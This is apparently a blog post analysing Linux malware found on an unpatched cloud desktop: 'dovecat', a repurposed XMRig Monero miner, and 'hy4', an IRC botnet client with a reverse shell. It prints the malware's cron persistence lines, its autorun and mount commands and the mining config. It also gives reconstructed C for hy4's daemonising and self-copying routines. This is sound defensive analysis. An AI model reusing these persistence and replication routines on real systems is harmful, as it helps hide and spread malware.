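<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>* * * * * /tmp/bash7 > /dev/null 2>&1 &
* * * * * /var/lock/bash7 > /dev/null 2>&1 &
* * * * * /var/tmp/sh7 > /dev/null 2>&1 &
* * * * * /dev/shm/bash7 > /dev/null 2>&1 &
* * * * * /tmp/init7 > /dev/null 2>&1 &
</code></pre></div></div>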
<p>At this point, I asked for samples to be collected for the following files:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/tmp/dovecat
/var/lock/bash7
/var/tmp/sh7
/tmp/bash7
/dev/shm/bash7
/tmp/init7
</code></pre></div></div>
<p>They were collected and uploaded to the case, so let’s start doing some
in-depth analysis, shall we?</p>
<h1 id="basic-information-on-the-collected-samples">Basic Information on the Collected Samples</h1>
<p>If you want to follow along at home, you can find the samples analysed
by searching for their SHA256 hash on Google or VirusTotal. I don’t really want
to host live malware on my blog, so I won’t offer the samples as a download.</p>
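<p>If you do have the samples on hand, you can verify the hashes with coreutils:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ sha256sum dovecat
10c0ed6e8223e4c18475c39beec579911bb18d5e64bf33d2de051c9c59138a08  dovecat
</code></pre></div></div>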
<p>Alright, let’s have a look at what we have here.</p>
<h2 id="dovecat">dovecat</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SHA256 10c0ed6e8223e4c18475c39beec579911bb18d5e64bf33d2de051c9c59138a08
$ file dovecat
dovecat: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=5abe6768b29bdf70910880c44f79c991682b439f, stripped
</code></pre></div></div>
<p>Okay, nothing too surprising here. Statically linked executable built for 64 bit
Linux. Let’s check VirusTotal for the hash:</p>
<p><a href="https://www.virustotal.com/gui/file/10c0ed6e8223e4c18475c39beec579911bb18d5e64bf33d2de051c9c59138a08/detection">VirusTotal - dovecat</a></p>
<p>It seems we have a match, and only very recently too. Currently 29 / 61 virus
scanning engines detect the binary as a virus, and interestingly, it was first
submitted on 2020-10-09 23:23:39, meaning that this executable has been compiled
within the last month or so.</p>
<p><img src="/assets/images/2020_025.png" alt="virustotal - dovecat" /></p>
<p>The engines seem to class this as some sort of cryptocurrency miner, so we will
need to dig into this a bit further.</p>
<p><img src="/assets/images/2020_027.png" alt="Cutter" /></p>
<p>This is one big executable, at 7 MB. We have 6416 functions, which is a lot,
although since the binary is statically linked, many of those will be library
functions linked into the base executable.</p>
<p>What is interesting is the compiler: <code class="language-plaintext highlighter-rouge">GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609</code>.
It seems the attacker compiled on Ubuntu 16.04, using the <a href="https://packages.ubuntu.com/xenial/gcc-5"><code class="language-plaintext highlighter-rouge">gcc-5</code> package</a>
at the latest version.</p>
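<p>That compiler string lives in the binary’s <code class="language-plaintext highlighter-rouge">.comment</code> section, and the same
<code class="language-plaintext highlighter-rouge">strings</code> trick we use for UPX below will surface it (output trimmed):</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strings dovecat | grep GCC
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
</code></pre></div></div>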
<h2 id="bash7--init7--sh7">bash7 / init7 / sh7</h2>
<p>These files are interesting, as all the following samples that were collected:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/var/lock/bash7
/var/tmp/sh7
/tmp/bash7
/dev/shm/bash7
/var/lock/bash7
/tmp/init7
</code></pre></div></div>
<p>have the same hash, and are in fact the same executable. I did a quick check,
and it seems they are packed with UPX:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ strings init7 | grep UPX
UPX!
$Info: This file is packed with the UPX executable packer http://upx.sf.net $
$Id: UPX 3.94 Copyright (C) 1996-2017 the UPX Team. All Rights Reserved.
</code></pre></div></div>
<p>I installed UPX, and found that the samples unpack with no problems. The attacker
seems to be using an unmodified version of UPX.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ upx -d init7
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2017
UPX 3.94 Markus Oberhumer, Laszlo Molnar & John Reiser May 12th 2017
File size Ratio Format Name
-------------------- ------ ----------- -----------
73227 <- 36948 50.46% linux/i386 init7
Unpacked 1 file.
</code></pre></div></div>
<p>Alright, now the basic stats:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SHA256 f9c3165b9634b8f0ee139905b32e396ab10b30b74a05f4f705b18e841302555
SHA256 (unpacked) 22f1c7056beb9be8acf2ca5b4185ebe422b5566af7b36052b85d35686e38b456
$ file init7
init7: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
</code></pre></div></div>
<p>Not stripped? Now that’s interesting. Let’s check VirusTotal.</p>
<p><a href="https://www.virustotal.com/gui/file/22f1c7056beb9be8acf2ca5b4185ebe422b5566af7b36052b85d35686e38b456/detection">VirusTotal - hy4</a></p>
<p>Interesting again, only 6 / 61 virus engines detect this as malware. It seems
very new as well, with the first submission only being 4 days ago: 2020-10-22 08:40:27.</p>
<p><img src="/assets/images/2020_026.png" alt="Virustotal - init7" /></p>
<p>This malware has something to hide, that’s for sure. We are going to need to look
deeper into this one as well.</p>
<p><img src="/assets/images/2020_034.png" alt="cutter" /></p>
<p>This binary is much smaller, at 72 KB. There are still a lot of functions, 241
of them, but they are mostly going to be library functions that have been statically
linked. The compiler is a bit older, and doesn’t seem to be an Ubuntu-provided
one.</p>
<h1 id="advanced-static-analysis">Advanced Static Analysis</h1>
<p>Time to have a look into these executables from an assembly language perspective,
and see if we can determine exactly what these binaries do.</p>
<p>Today I’ll be using radare2-cutter and Ghidra, just the latest upstream versions
from their respective websites.</p>
<h2 id="dovecat-1">dovecat</h2>
<p>The entrypoint to dovecat isn’t interesting; it seems to jump around and set up
various statically linked libraries. I skipped ahead to <code class="language-plaintext highlighter-rouge">main()</code>:</p>
<p><img src="/assets/images/2020_028.png" alt="main" /></p>
<p>We seem to check some magic numbers, and if the check fails, we exit, otherwise
we enter an infinite loop that calls three functions over and over.</p>
<p>Those three functions themselves aren’t interesting either. Looks like we will
have to go hunting for some strings and do some x-refs to see what is going on.</p>
<p>With 101933 strings to go through, reading them all is not feasible, so we will
have to search instead. Since VirusTotal seems to think this is a cryptocurrency miner, let’s
try terms like “bitcoin”, “coin” and “mine”.</p>
<p>“bitcoin” came up empty. “coin” wasn’t useful either. “mine” was very, very
useful, since it came up with this string:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>{"autosave": true,
"donate-level": 0,
"cpu": true,
"opencl": false,
"cuda": false,
"pools":
[
{
"url": "pool.minexmr.com:443",
"user": "46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ",
"rig-id": "w1",
"keepalive": true,
"tls": true
}
]
}
</code></pre></div></div>
<p>This seems to be some sort of configuration for this binary. It has CPU mining
enabled, but OpenCL and CUDA disabled. Weird; normally you would want to take
advantage of a GPU if the system has one.</p>
<p>It also shows it is a member of the mining pool <code class="language-plaintext highlighter-rouge">pool.minexmr.com:443</code>,
and supplies a user hash <code class="language-plaintext highlighter-rouge">46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ</code>.</p>
<p>Let’s go to the mining pool website, and see if we can get some information
about the user hash we have here.</p>
<p><a href="https://beta.minexmr.com/dashboard?address=46bHvv8wD6B2PF3aiNoWq2K89GiT5QXpFYg2dP898PRwasqWYSEHzNjVznCPCDpoNa7N8QPJD94P4jK4pWKoRixB5zR3TnQ">MineXMR Mining Dashboard</a></p>
<p>Well, well, well, what have we stumbled upon.</p>
<p><img src="/assets/images/2020_029.png" alt="Mine XMR" /></p>
<p>It seems this user hash is a wallet public key for the Monero cryptocurrency.
Monero is one of those privacy coins with a hidden ledger. You can’t see the
balance of a particular wallet. Kind of frustrating for detectives you know?</p>
<p>Anyway, it seems the attacker is pulling a hashrate of 161kh/s, over 3 “workers”.
At the time of writing, they have pocketed 1.861194 XMR for their efforts,
which is about $248 USD or $371 NZD or $210 Euro.</p>
<p><img src="/assets/images/2020_030.png" alt="Hashrate" /></p>
<p>The hashrate seems to be trending upward overall, but it fluctuates, probably as
machines are infected, start mining, get discovered by their owners, and are then
taken offline.</p>
<p><img src="/assets/images/2020_031.png" alt="Workers" /></p>
<p>There seem to be 3 “workers”, although I think multiple machines are identifying
themselves as a single “worker”. The configuration string we saw had <code class="language-plaintext highlighter-rouge">"rig-id": "w1"</code>
set, which means this system was probably reporting as the <code class="language-plaintext highlighter-rouge">w1</code> worker.</p>
<p>Alright, we have now established that this malware is likely a Monero (XMR)
cryptocurrency miner. Now we need to see if this program is hiding any
other secrets, or if it is just an off-the-shelf miner.</p>
<p>Back to string searching in the binary, it seems we have found a man page, or
the documentation for the program:</p>
<p><img src="/assets/images/2020_032.png" alt="man page" /></p>
<p><img src="/assets/images/2020_033.png" alt="more strings" /></p>
<p>These strings indicate that this is a copy of <code class="language-plaintext highlighter-rouge">XMRig 6.3.3</code>, which is free and
open source Monero mining software. Its upstream code repository is:</p>
<p><a href="https://github.com/xmrig/xmrig">https://github.com/xmrig/xmrig</a></p>
<p>Having a further look at the binary, it looks like the attacker just
cloned the repo, hard-coded their configuration in, statically compiled
a binary, and named it <code class="language-plaintext highlighter-rouge">dovecat</code> to try to make it blend into a system, so
people would think it is just <code class="language-plaintext highlighter-rouge">dovecot</code>, which is a mail daemon.</p>
<p>I don’t think we need to look at any more assembly for this executable; it is
too large, and the rest of it is very likely just stock XMRig code. We can
always catch any bad behaviour during dynamic analysis.</p>
<h2 id="bash7--init7--sh7-aka-hy4">bash7 / init7 / sh7 aka hy4</h2>
<p>Time to dive into the next malware sample, bash7 / init7 / sh7. This one is
small enough that we should be able to cover most of its functions.</p>
<p>Now, what I find striking about this sample is that it isn’t stripped.
This sample has its debug symbols intact. Why? Did the attacker forget to strip
the binary before pushing it to the world? Or is it intentional? Who knows.</p>
<p>But we are exceptionally lucky. Now we can get some serious insight into this
binary.</p>
<p>Ghidra shows us a list of files from which this executable was compiled. There
are 190 different files in total; a few of them are shown below:</p>
<p><img src="/assets/images/2020_035.png" alt="files" />
<a href="/assets/bin/hy4_filelist.txt">Click for full list of files</a></p>
<p>The only one that stood out was “hy4.c”. It doesn’t seem to be a part of any
standard library, and searches return no results. I suppose we will call this
malware <strong>hy4</strong> from now on.</p>
<p>Since we can see a list of all the functions this malware calls, it shouldn’t be too
hard to determine what it does.</p>
<p><img src="/assets/images/2020_036.png" alt="functions" />
<a href="/assets/bin/hy4_functions.txt">Click for full list of functions</a></p>
<p>Let’s jump to <code class="language-plaintext highlighter-rouge">main()</code> and have a look:</p>
<p>The control flow graph itself isn’t too bad. We seem to have a large initialisation
stage, followed by some blocks at the bottom which seem to be infinite loops
that the program switches between.</p>
<p><img src="/assets/images/2020_037.png" alt="control flow graph" /></p>
<p>The first thing that hy4 does is call <code class="language-plaintext highlighter-rouge">rand_init()</code>, <code class="language-plaintext highlighter-rouge">daemonize()</code> and
<code class="language-plaintext highlighter-rouge">bindport()</code>. Let’s see what these do.</p>
<p><img src="/assets/images/2020_038.png" alt="3 functions" /></p>
<p><code class="language-plaintext highlighter-rouge">rand_init()</code> seems to set ‘x’ to the time, ‘y’ seems to be the xor of process
id and parent process id, and z seems to be the clock. w seems to be the xor
of clock and time.</p>
<p><img src="/assets/images/2020_039.png" alt="rand" /></p>
<p><code class="language-plaintext highlighter-rouge">daemonize()</code> seems to see if the process is a child, and if it isn’t, then
it forks. It checks to see if <code class="language-plaintext highlighter-rouge">fork()</code> fails, and if it does then it exits, and
the parent also exits. Only the child remains running.</p>
<p><img src="/assets/images/2020_040.png" alt="daemonize" /></p>
<p>It then redirects the program’s file descriptors for stdin and stdout to
<code class="language-plaintext highlighter-rouge">/dev/null</code>, and changes the signal handler for the following signals:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0x11 - SIGCHLD
0x14 - SIGTSTP
0x16 - SIGTTOU
0x15 - SIGTTIN
1 - SIGHUP
0xf - SIGTERM
</code></pre></div></div>
<p>The new signal handler is 0x1, which is <code class="language-plaintext highlighter-rouge">SIG_IGN</code>, so these signals are simply
ignored. Looking at the signals changed, it seems
the attacker really doesn’t want this malware to be killed or interrupted.</p>
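<p>Putting those pieces together, the daemonisation behaviour described above maps onto a very standard pattern. The sketch below is my own reconstruction for illustration, not the attacker’s source code; the function name simply mirrors what Ghidra shows, and the infinite <code class="language-plaintext highlighter-rouge">pause()</code> loop stands in for the real bot logic.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Reconstruction of hy4's daemonize() behaviour, for illustration only. */
static void daemonize(void)
{
    pid_t pid = fork();
    if (pid < 0)
        exit(1);                 /* fork() failed, give up */
    if (pid > 0)
        exit(0);                 /* parent exits, only the child keeps running */

    /* Throw away stdin and stdout so nothing appears on a terminal. */
    freopen("/dev/null", "r", stdin);
    freopen("/dev/null", "w", stdout);

    /* Ignore the signals that would normally stop or kill the process. */
    signal(SIGCHLD, SIG_IGN);
    signal(SIGTSTP, SIG_IGN);
    signal(SIGTTOU, SIG_IGN);
    signal(SIGTTIN, SIG_IGN);
    signal(SIGHUP,  SIG_IGN);
    signal(SIGTERM, SIG_IGN);
}

int main(void)
{
    daemonize();
    for (;;)
        pause();                 /* the real bot enters its IRC loop here */
}
</code></pre></div></div>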
<p><code class="language-plaintext highlighter-rouge">bindport()</code> seems to create a socket, and bind it. To see what port,
we bind <code class="language-plaintext highlighter-rouge">&local_18</code> of type <code class="language-plaintext highlighter-rouge">sockaddr</code>. The compiler has done some stuff, so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>struct sockaddr {
sa_family_t sa_family;
char sa_data[14];
}
</code></pre></div></div>
<p><img src="/assets/images/2020_041.png" alt="bindport" /></p>
<p><code class="language-plaintext highlighter-rouge">sa_family</code> is <code class="language-plaintext highlighter-rouge">2</code> as per <code class="language-plaintext highlighter-rouge">&local_18</code>. <code class="language-plaintext highlighter-rouge">sa_data</code> is derived from <code class="language-plaintext highlighter-rouge">local_14</code> and
<code class="language-plaintext highlighter-rouge">local_16</code>.</p>
<p>We then start listening on the port.</p>
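<p>In other words, <code class="language-plaintext highlighter-rouge">bindport()</code> boils down to the standard socket, bind and listen sequence. Below is a minimal sketch of that pattern, not hy4’s decompiled code; the port number is a placeholder, since the real value is whatever <code class="language-plaintext highlighter-rouge">local_14</code> and <code class="language-plaintext highlighter-rouge">local_16</code> encode.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <arpa/inet.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>

/* Illustrative sketch of bindport(); LISTEN_PORT is a placeholder. */
#define LISTEN_PORT 4444

static int bindport(void)
{
    struct sockaddr_in addr;
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        exit(1);

    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;              /* the "2" we saw in &local_18 */
    addr.sin_addr.s_addr = INADDR_ANY;
    addr.sin_port = htons(LISTEN_PORT);     /* really derived from local_14/local_16 */

    if (bind(fd, (struct sockaddr *)&addr, sizeof(addr)) < 0)
        exit(1);
    if (listen(fd, 5) < 0)
        exit(1);

    return fd;
}
</code></pre></div></div>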
<p>What happens next is kinda weird. hy4 checks to see if <code class="language-plaintext highlighter-rouge">/share/CACHEDEV1_DATA/Web</code>
exists. If it does, we enter the if statement:</p>
<p><img src="/assets/images/2020_042.png" alt="CACHEDEV" /></p>
<p>It then executes some shell commands using <code class="language-plaintext highlighter-rouge">system()</code>. The first tries to mount
a bunch of devices in a brute force fashion to <code class="language-plaintext highlighter-rouge">/tmp/config</code>, with the below
command:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mount $(/sbin/hal_app --get_boot_pd port_id=0)6 /tmp/config ;
mount -t ext2 /dev/mtdblock4 /tmp/config ;
mount -t ext2 /dev/mtdblock5 /tmp/config ;
mount -t ext2 /dev/sdx6 /tmp/config ;
mount -t ext2 /dev/sdc6 /tmp/config"
</code></pre></div></div>
<p>If any of these succeed, then it runs a command to make an autorun file that is
a shell script:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo \"#!/bin/sh\n%s\" > /tmp/config/autorun.sh ;
chmod +x /tmp/config/autorun.sh
</code></pre></div></div>
<p>The script seems empty for now. What is this <code class="language-plaintext highlighter-rouge">/share/CACHEDEV1_DATA/Web</code> directory?
Is it from some sort of vulnerable Internet of Things device? I googled it and
it seems to be for QNAP devices. QNAP seems to manufacture NAS devices, video cameras
and the like. Typical Internet of Things hardware.</p>
<p>Moving on.</p>
<p>The code then attempts to access a bunch of directories to see if they are
writable.</p>
<p><img src="/assets/images/2020_043.png" alt="writable" /></p>
<p>These directories look familiar…</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/dev/shm/
/var/tmp/
/tmp/
/var/lock/
/var/run/
</code></pre></div></div>
<p>If they are writable, they get added to some sort of list. It then goes and
opens a few crontabs, and does some greps.</p>
<p><img src="/assets/images/2020_044.png" alt="crontab" /></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"(crontab -l | grep -v \"/%s\" | grep -v \"/sh7\" | grep -v \"/init7\" | grep -v \"/bash7\" | grep -v \"no cron\" > %s) > /dev/null 2>&1"
</code></pre></div></div>
<p>Hmm. Is it checking to see if the crontab is already infected? I think it is.</p>
<p>If the system is not already infected, it calls <code class="language-plaintext highlighter-rouge">injectbot()</code> on the following
directories:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$PWD
/dev/shm/
/var/tmp/
/tmp/
/var/lock/
/var/run/
</code></pre></div></div>
<p>Lets look at <code class="language-plaintext highlighter-rouge">injectbot()</code>:</p>
<p><img src="/assets/images/2020_045.png" alt="injectbot" /></p>
<p>It seems to have “init7”, “bash7” and “sh7” hard-coded, and selects one of them randomly
depending on <code class="language-plaintext highlighter-rouge">gettimeofday()</code> and a random chance. From there it <code class="language-plaintext highlighter-rouge">malloc()</code>s a
buffer, reads a copy of the running executable into it, and writes it out to the
new path with the randomly chosen name.</p>
<p>Since this happens a bunch of times, we end up with all the duplicate copies.</p>
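<p>Reconstructed as C, the copy logic looks roughly like the sketch below. This is an illustration of the pattern visible in the decompilation, not the attacker’s source; in particular, reading <code class="language-plaintext highlighter-rouge">/proc/self/exe</code> is my assumption of how the running binary is located.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <fcntl.h>
#include <stdio.h>
#include <sys/time.h>
#include <unistd.h>

/* Illustration of injectbot(): copy the running executable into 'dir'
 * under one of the hard-coded names. */
static void injectbot(const char *dir)
{
    static const char *names[] = { "init7", "bash7", "sh7" };
    struct timeval tv;
    char dest[512], buf[4096];
    ssize_t n;
    int in, out;

    /* Pick one of the three names pseudo-randomly, as the binary does. */
    gettimeofday(&tv, NULL);
    snprintf(dest, sizeof(dest), "%s/%s", dir, names[tv.tv_usec % 3]);

    /* Assumption: /proc/self/exe is used to read our own executable back. */
    in = open("/proc/self/exe", O_RDONLY);
    out = open(dest, O_WRONLY | O_CREAT | O_TRUNC, 0755);
    if (in < 0 || out < 0)
        return;

    while ((n = read(in, buf, sizeof(buf))) > 0)
        write(out, buf, n);

    close(in);
    close(out);
}
</code></pre></div></div>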
<p>Once these copies are in place, a new cronjob is installed on the system, in this
case at <code class="language-plaintext highlighter-rouge">/var/spool/cron/crontabs/daemon</code>.</p>
<p>If we look at the sosreport from the infected system, we see:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/var/lock/.hh21804289383 installed on Thu Oct 22 12:54:01 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
*/10 * * * * /var/tmp/bash7 > /dev/null 2>&1 &
*/2 * * * * /var/lock/init7 > /dev/null 2>&1 &
*/1 * * * * /dev/shm/sh7 > /dev/null 2>&1 &
*/10 * * * * /tmp/init7 > /dev/null 2>&1 &
</code></pre></div></div>
<p>We now fully understand how this malware gains persistence (cronjobs and redundant
binaries), and prevents itself from being terminated (forking into a daemon, re-registering
signal handlers).</p>
<p>Now things start getting more interesting. We have reached the end of the large
initialisation section, and have now entered the loops of what seems to be
IRC server communication.</p>
<p><img src="/assets/images/2020_046.png" alt="IRC" /></p>
<p>We make some random numbers, and call <code class="language-plaintext highlighter-rouge">makestring()</code>, which in turn makes a string
out of the hostname or uname with some random characters added to the end:</p>
<p><img src="/assets/images/2020_047.png" alt="uname" /></p>
<p>From there, the result of <code class="language-plaintext highlighter-rouge">makestring()</code> becomes the system’s IRC nick.
It connects to channel <code class="language-plaintext highlighter-rouge">#XLM</code> with pass <code class="language-plaintext highlighter-rouge">321</code>:</p>
<p><img src="/assets/images/2020_048.png" alt="channel" /></p>
<p><img src="/assets/images/2020_049.png" alt="password" /></p>
<p>After that, hy4 calls <code class="language-plaintext highlighter-rouge">con()</code>, which seems to have functionality to swap
between different IRC servers. What it seems to do on the first try is connect
to <code class="language-plaintext highlighter-rouge">5.253.84.148</code>, use the nick, channel and pass from before,
and send the string <code class="language-plaintext highlighter-rouge">"NICK %s\nUSER K localhost localhost :2010\n"</code>.</p>
<p><img src="/assets/images/2020_050.png" alt="con" /></p>
<p>After that, two main things happen:</p>
<p>The first is that hy4 <code class="language-plaintext highlighter-rouge">recv()</code>s some data, and then calls <code class="language-plaintext highlighter-rouge">strtok()</code> to parse
it:</p>
<p><img src="/assets/images/2020_051.png" alt="recv" /></p>
<p>There isn’t any indication of what the commands being parsed are, though.</p>
<p><img src="/assets/images/2020_052.png" alt="parse" /></p>
<p>We stay in this loop forever though, so hy4 always waits for instructions, then
goes to execute them.</p>
<p><img src="/assets/images/2020_053.png" alt="call ecx" /></p>
<p>See that <code class="language-plaintext highlighter-rouge">call ecx</code> on the far right? It seems we load the address of a function
into <code class="language-plaintext highlighter-rouge">ecx</code> and call it. I’m not sure which function, though.</p>
<p>Let’s have a look for other functions to see what functionality the IRC
commands might call.</p>
<p><img src="/assets/images/2020_054.png" alt="functions" /></p>
<p><code class="language-plaintext highlighter-rouge">376()</code> seems to be how hy4 joins a IRC server, and is pretty explicit:</p>
<p><img src="/assets/images/2020_055.png" alt="376" /></p>
<p><code class="language-plaintext highlighter-rouge">433()</code> seems to rotate the IRC nick.</p>
<p><img src="/assets/images/2020_056.png" alt="433" /></p>
<p><code class="language-plaintext highlighter-rouge">_NICK()</code> seems to check for a specific IRC nick.</p>
<p><img src="/assets/images/2020_057.png" alt="nick" /></p>
<p><code class="language-plaintext highlighter-rouge">ping()</code> just seems to reply on IRC with “pong”.</p>
<p><img src="/assets/images/2020_058.png" alt="ping" /></p>
<p><code class="language-plaintext highlighter-rouge">cback()</code> turned out to be extremely interesting. It appears to fork off a new
process, which makes a socket, and connects to a remote host on a specific
port and IP.</p>
<p><img src="/assets/images/2020_059.png" alt="cback" /></p>
<p>This is your classic reverse shell. It takes two parameters, “IP” and “PORT”,
and if you pass any more, you get an IRC error message with
<code class="language-plaintext highlighter-rouge">"NOTICE %s :CBACK <ip> <port>\n"</code>.</p>
<p>When you connect to the reverse shell, you see the strings:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>"NOTICE %s :Connected.\n"
"echo [-] logged at `date`"
"echo [-] `uname -a || cat /proc/version`"
</code></pre></div></div>
<p>If you are lucky enough, it will even check for gid 0, and print “root shell!”
if you happen to be root:</p>
<p><img src="/assets/images/2020_060.png" alt="root shell" /></p>
<p>It then calls <code class="language-plaintext highlighter-rouge">execve("/bin/sh")</code>, and a shell is spawned for the remote attacker.
stdin and stdout are redirected to the socket via the calls to <code class="language-plaintext highlighter-rouge">dup2()</code>.</p>
<p><img src="/assets/images/2020_061.png" alt="dup2" /></p>
<p>There seem to be some steps taken to prevent any commands from this shell
from being logged. It also exports a normal <code class="language-plaintext highlighter-rouge">$PATH</code>.</p>
<p><img src="/assets/images/2020_065.png" alt="history" /></p>
<p>I went and tracked down all the strings from the hy4 section, and found:</p>
<p><img src="/assets/images/2020_062.png" alt="strings" /></p>
<p>It seems the commands are just: <code class="language-plaintext highlighter-rouge">CBACK</code>, <code class="language-plaintext highlighter-rouge">IRC</code>, <code class="language-plaintext highlighter-rouge">NOTICE</code>, <code class="language-plaintext highlighter-rouge">MODE</code>, <code class="language-plaintext highlighter-rouge">JOIN</code>, <code class="language-plaintext highlighter-rouge">PONG</code>,
<code class="language-plaintext highlighter-rouge">PRIVMSG</code>, <code class="language-plaintext highlighter-rouge">PING</code>, <code class="language-plaintext highlighter-rouge">NICK</code>.</p>
<p>I wonder what this string is:</p>
<p><img src="/assets/images/2020_063.png" alt="jp string" /></p>
<p><img src="/assets/images/2020_064.png" alt="translate" /></p>
<p>Playful thoughts indeed.</p>
<p>I think that about wraps up the analysis of <strong>hy4</strong>. What I didn’t come across
was a way for a file to be downloaded and executed automatically, but the
functionality could very well be there, and I just didn’t look hard enough.</p>
<h1 id="executive-summary-of-malware-infection">Executive Summary of Malware Infection</h1>
<h2 id="infection-vector">Infection Vector</h2>
<p>For this particular system, the initial infection vector is unknown.</p>
<p>My only remarks are:</p>
<ol>
<li>The system was out of date, and had not been patched at all in at least 18 months.</li>
<li>The system was running as a desktop computer, virtualised in the cloud.</li>
</ol>
<p>Firefox was very old, at version 68. If you run old, outdated browsers, along with
being out of date on other software, such as the kernel, you open yourself
up to drive-by downloads and arbitrary code execution vulnerabilities.</p>
<p>Desktop tasks are exposed to more risks than a standard production
workload, due to web browsing and constantly executing untrusted code in the
form of Javascript. It is important to keep these systems up to date, and not
forget about them when they are hidden away as virtualised appliances.</p>
<p>I do not believe that this malware was targeted. Quite the opposite: it seems
that this malware was just opportunistic, in the right place at the right time,
and the attacker was only motivated by making a quick buck.</p>
<p>hy4 was likely first onto the system, and, acting as a malware dropper, was likely
instructed to download and execute dovecat as its payload.</p>
<h2 id="dovecat-2">dovecat</h2>
<p>dovecat is a cryptocurrency miner built from a freely accessible program called
XMRig, at version 6.3.3. It uses CPU and memory resources to process currency
transactions for the Monero (XMR) cryptocurrency.</p>
<p>The executable itself is not dangerous. It does not steal data. All it does is
consume computing resources for financial gain in the form of Monero.</p>
<p>dovecat can be removed by terminating the process and deleting the executable.</p>
<h2 id="hy4">hy4</h2>
<p>hy4 is dangerous and should be considered a threat. Due to hy4 connecting to
and forming part of an IRC botnet, and accepting commands remotely, any system
found to be infected with hy4 should be considered compromised, and should be
removed from production immediately.</p>
<p>Since an attacker has the ability to spawn a root shell, and interact with it
remotely, an attacker can explore the compromised system, and can steal data
with ease. All credentials on this machine should be revoked, and it should be
assumed that an attacker has had constant remote access to the compromised machine.</p>
<p>Since hy4 gains deep persistence and is difficult to terminate, I recommend that
the system be decommissioned, erased, and reinstalled fresh in order to
remove the infection.</p>
<h2 id="recommendations">Recommendations</h2>
<p>I always recommend you keep your system up to date. If possible, patch daily
or at least weekly, and it helps if you are running the latest Ubuntu LTS.</p>
<p>If you have a small number of machines, you can install a program called
<code class="language-plaintext highlighter-rouge">unattended-upgrades</code> with <code class="language-plaintext highlighter-rouge">$ sudo apt install unattended-upgrades</code>. It will
patch the machine on a regular schedule.</p>
<p>If you have a large fleet of machines, then maybe a service like
<a href="https://landscape.canonical.com/">Landscape</a> can be useful. It lets you view
your fleet’s update status on a nice web interface, and you can patch your
fleet with a few clicks in your web browser.</p>
<p>As always, only trust software from the official Ubuntu software archives. When
you download and install software from a website to your machine, you are taking
on the risk that the software might be malicious.</p>
<h1 id="my-thoughts-on-the-malware-and-attribution">My Thoughts on the Malware and Attribution</h1>
<p>I have reverse engineered a fair amount of malware in my time, but this was the
first Linux malware I have ever looked into. On the whole it was actually pretty
pleasant, due to Cutter and Ghidra being very mature tools. The only thing
missing is a good debugger, and I miss being able to use x64dbg, since it’s
Windows only.</p>
<p>The malware itself was pretty interesting. hy4 in particular is an interesting specimen;
dovecat less so, since it is a rebuilt open source miner, just hard-coded
to mine Monero for the attacker.</p>
<p>hy4 is strange at a first glance. Not stripping debugging symbols was a huge
mistake on the attacker’s part. It meant that I could read function names in
the code just as they were in the source code, and the symbols also helped
Ghidra’s decompiler build an accurate source code picture.</p>
<p>hy4 itself is also remarkably simple. It gains persistence, then joins an IRC
botnet and awaits external instructions. Its functionality allows it to spawn a
reverse shell back to the attacker, and it very likely carries functionality to
download and execute further malware.</p>
<p>It seems very basic. Someone has obviously written this as their first foray
into cybercrime. The techniques used to gain persistence and prevent being
terminated are entry level, but it is still non-trivial, since it talks to a remote C2 server.</p>
<p>This is no teenage script kiddy. This is a semi-experienced to experienced
software engineer who is likely very new to writing malware, and this is
probably their first botnet.</p>
<p>The malware was written by hand, and the botnet is probably owned by the author
of the malware. The author is probably early in their career, having recently finished
University with some sort of Computer Science degree, and has taken some
operating system classes to learn about <code class="language-plaintext highlighter-rouge">fork()</code>, <code class="language-plaintext highlighter-rouge">dup2()</code> and signals.</p>
